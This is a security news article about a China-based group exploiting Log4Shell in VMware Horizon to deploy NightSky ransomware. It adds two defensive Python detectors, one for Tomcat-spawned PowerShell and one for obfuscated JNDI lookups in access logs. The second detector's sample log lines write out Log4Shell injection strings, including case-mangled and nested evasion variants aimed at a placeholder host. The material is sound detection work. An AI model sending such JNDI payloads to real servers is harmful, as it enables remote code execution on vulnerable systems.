
China-Based Actors Using Log4Shell Bug for Ransomware Deployment

A China-based group that has deployed ransomware in the past is currently exploiting the Log4Shell vulnerability in some versions of the VMware Horizon server to gain initial access and eventually install the NightSky ransomware.

The group, which Microsoft researchers refer to as DEV-0401, is one of many groups known to be exploiting the Log4Shell vulnerability (CVE-2021-44228). Many of those groups use the flaw to get a foothold on a target network, drop webshells, RATs, or other malware to maintain persistence, and then move laterally through the network. Researchers have also reported ransomware deployments in some isolated intrusions. The group Microsoft has identified as installing the NightSky ransomware is not one of the major, known APT teams, but it is taking advantage of the easy availability of exploit code and the large number of vulnerable servers exposed to the Internet.

“These attacks are performed by a China-based ransomware operator that we’re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473). Based on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains,” Microsoft Threat Intelligence Center analysts said Monday.

Last week, analysts at the UK’s National Health Service Digital warned that other attackers were targeting the Log4Shell vulnerability in VMware Horizon server versions 7.x and 8.x to install webshells for persistent access. Those attacks targeted the Apache Tomcat service on vulnerable servers: the actors ran a specific PowerShell command spawned by the Tomcat service, then restarted the VMBlastSG service and installed a small listener to communicate with the C2 server.

“The commands are stored as a header object (named 'data') in the crafted requests. This process is used to establish persistent communication with a command and control server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware,” the advisory says.
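The NHS Digital advisory describes a Tomcat-hosted service spawning PowerShell, which is a parent-child relationship defenders can look for in process-creation telemetry. The Python below is an added example written for this article, not code from the advisory or from Microsoft: it flags shell processes whose parent is the Tomcat service and decodes a Base64 `-EncodedCommand` argument for triage. The events, file paths and command lines are constructed samples; the field names follow Sysmon-style process-creation events, and the Tomcat executable names and the `catalina` keyword check are assumptions about how Tomcat shows up in a given deployment.

```python
import base64
import re
from pathlib import PureWindowsPath

# Child processes that a web-application server should not normally launch.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumed Tomcat launcher names (procrun service wrappers) and JVM images.
TOMCAT_IMAGES = {"tomcat7.exe", "tomcat8.exe", "tomcat9.exe", "tomcat10.exe"}
JAVA_IMAGES = {"java.exe", "javaw.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_powershell(script: str) -> str:
    """-EncodedCommand carries Base64 of the UTF-16LE script text (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell(command_line: str):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    match = ENC_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def is_tomcat_parent(event: dict) -> bool:
    """Treat the parent as Tomcat if it is a procrun wrapper or a JVM started with Catalina."""
    parent = _basename(event["ParentImage"])
    if parent in TOMCAT_IMAGES:
        return True
    parent_cmd = event.get("ParentCommandLine", "").lower()
    return parent in JAVA_IMAGES and ("catalina" in parent_cmd or "tomcat" in parent_cmd)


def find_tomcat_spawned_shells(events):
    """Return one finding per shell process whose parent is the Tomcat service."""
    findings = []
    for event in events:
        child = _basename(event["Image"])
        if child in SHELLS and is_tomcat_parent(event):
            findings.append({
                "pid": event["ProcessId"],
                "parent": _basename(event["ParentImage"]),
                "child": child,
                "command_line": event["CommandLine"],
                "decoded": decode_powershell(event["CommandLine"]),
            })
    return findings


# Constructed sample events (Sysmon-style field names); paths and commands are placeholders.
SAMPLE_EVENTS = [
    {   # Tomcat service wrapper spawning hidden, encoded PowerShell: should be flagged
        "ProcessId": 4120,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_powershell("Write-Output 'sample'"),
        "ParentImage": r"C:\Tomcat\bin\tomcat9.exe",
        "ParentCommandLine": r'"C:\Tomcat\bin\tomcat9.exe" //RS//Tomcat9',
    },
    {   # JVM running Catalina directly, spawning cmd.exe: should be flagged
        "ProcessId": 4188,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c ver",
        "ParentImage": r"C:\Java\bin\java.exe",
        "ParentCommandLine": r"java.exe -Dcatalina.home=C:\Tomcat org.apache.catalina.startup.Bootstrap start",
    },
    {   # Interactive PowerShell started from Explorer: benign
        "ProcessId": 5001,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": "explorer.exe",
    },
    {   # Tomcat spawning a JVM helper: not a shell, so not flagged
        "ProcessId": 5320,
        "Image": r"C:\Java\bin\java.exe",
        "CommandLine": "java.exe -version",
        "ParentImage": r"C:\Tomcat\bin\tomcat9.exe",
        "ParentCommandLine": r'"C:\Tomcat\bin\tomcat9.exe" //RS//Tomcat9',
    },
]

if __name__ == "__main__":
    for finding in find_tomcat_spawned_shells(SAMPLE_EVENTS):
        print(finding)
```

The parent check is deliberately tolerant of how Tomcat is launched (a procrun wrapper or a bare JVM with Catalina on the command line), since VMware Horizon and other products bundle their own Tomcat instances under product-specific paths; the parent image name alone is not a reliable indicator.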

Microsoft researchers said that they began seeing the DEV-0401 attackers exploiting the Log4Shell flaw to install ransomware on Jan. 4. But those intrusions are only one piece of a much larger picture. APT teams, cybercrime groups, and many other actors all have been exploiting the Log4Shell bug, which is a vulnerability in the Apache Log4j tool, a ubiquitous logging utility that is used in an untold number of applications and tools.

The first vulnerability was disclosed in mid-December, and attacks had already begun by that time. Researchers soon discovered several other vulnerabilities in Log4j that can also lead to remote code execution. Affected vendors and maintainers of vulnerable open source projects have scrambled to release fixes, and defenders have spent the last few weeks working to get them in place and identify all of the weak spots in their infrastructure. In the meantime, attackers have taken advantage of the chaos to scan for vulnerable systems and target them with exploits.


“Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows,” MSTIC said.

“Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.”
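Microsoft's description of Base64 commands carried inside `${jndi:ldap://...}` lookups points at a pattern that web-server logs can be searched for. The Python below is an added example written for this article, not Microsoft's or Apache's code: it URL-decodes each log line, collapses the common `${lower:...}`, `${upper:...}` and `${...:-x}` nesting tricks into a plain lookup, reports the scheme and host the lookup points at, and decodes any Base64-looking path segment so an analyst can see what it carries. The log lines are constructed samples in Apache combined format, 198.51.100.10 is a documentation-range placeholder address, and the decoded payload is a harmless constructed string.

```python
import base64
import re
from urllib.parse import unquote

# Innermost ${...} lookup with no nested lookup inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A normalized JNDI lookup: scheme, host, optional port, remainder up to the closing brace.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)://([^/:}\s]+)(?::(\d+))?([^}\s\"]*)", re.I
)


def _resolve(match):
    """Evaluate obfuscation-only lookups; leave real lookups such as jndi: and date: untouched."""
    body = match.group(1)
    key, sep, rest = body.partition(":")
    key = key.strip().lower()
    if sep and key == "lower":
        return rest.lower()
    if sep and key == "upper":
        return rest.upper()
    if key != "jndi" and ":-" in body:          # ${env:UNSET:-j} and ${::-j} yield the default
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def decode_base64_segments(path: str):
    """Decode path segments that look like Base64 and hold printable ASCII.
    Segments are split on '/', so Base64 that itself contains '/' is not recovered whole."""
    decoded = []
    for segment in path.split("/"):
        if len(segment) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", segment):
            continue
        try:
            raw = base64.b64decode(segment, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if raw and raw.isprintable():
            decoded.append(raw)
    return decoded


def scan_line(line: str):
    """Return a finding dict if the line holds a JNDI lookup after normalization, else None."""
    normalized = normalize_lookups(line)
    match = JNDI_LOOKUP.search(normalized)
    if not match:
        return None
    scheme, host, port, path = match.groups()
    return {
        "scheme": scheme.lower(),
        "host": host,
        "port": int(port) if port else None,
        "path": path,
        "decoded_payloads": decode_base64_segments(path),
    }


def scan_lines(lines):
    findings = []
    for index, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            finding["line"] = index
            findings.append(finding)
    return findings


# Constructed sample access-log lines; 198.51.100.10 is a documentation-range placeholder.
SAMPLE_PAYLOAD = base64.b64encode(b"echo log4shell-test").decode("ascii")
LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=${${lower:j}${lower:n}${lower:d}i:'
    '${lower:ldap}://198.51.100.10/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}ndi:rmi://198.51.100.10/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.10'
    '%2FBase64%2F' + SAMPLE_PAYLOAD + '%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:10:00:06 +0000] "GET /?t=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_lines(LOG_LINES):
        print(finding)
```

Normalizing before matching is the important step: a plain `${jndi:` signature misses the split and case-mangled variants, while the collapse loop turns them back into the same string. The host and scheme in each finding are what a responder needs to check against egress logs, since the lookup only does damage if the server actually reached out to that address.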

Microsoft researchers and others have also observed attackers installing a variety of other malware post-exploitation, and have identified a number of individual APT groups that are exploiting the Log4Shell bug.

“For example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications,” MSTIC said.

“In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.”